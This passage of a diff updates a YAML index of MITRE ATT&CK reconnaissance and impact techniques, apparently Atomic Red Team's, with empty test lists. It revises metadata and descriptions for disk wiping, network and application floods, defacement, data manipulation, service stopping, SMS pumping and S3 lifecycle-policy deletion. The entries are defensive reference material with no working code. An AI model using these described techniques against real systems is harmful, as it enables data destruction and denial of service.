         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56374,8 +57058,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -56399,7 +57081,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56421,13 +57103,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -56519,13 +57199,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56534,7 +57213,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -56551,17 +57229,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -56586,7 +57259,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -56624,7 +57298,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -56658,12 +57332,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -56728,42 +57400,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -56774,13 +57531,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -56788,12 +57552,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -56854,109 +57639,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -56965,10 +57720,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -56979,39 +57738,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57029,13 +57786,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57043,36 +57807,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57081,11 +57836,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57094,17 +57855,31 @@ impact:
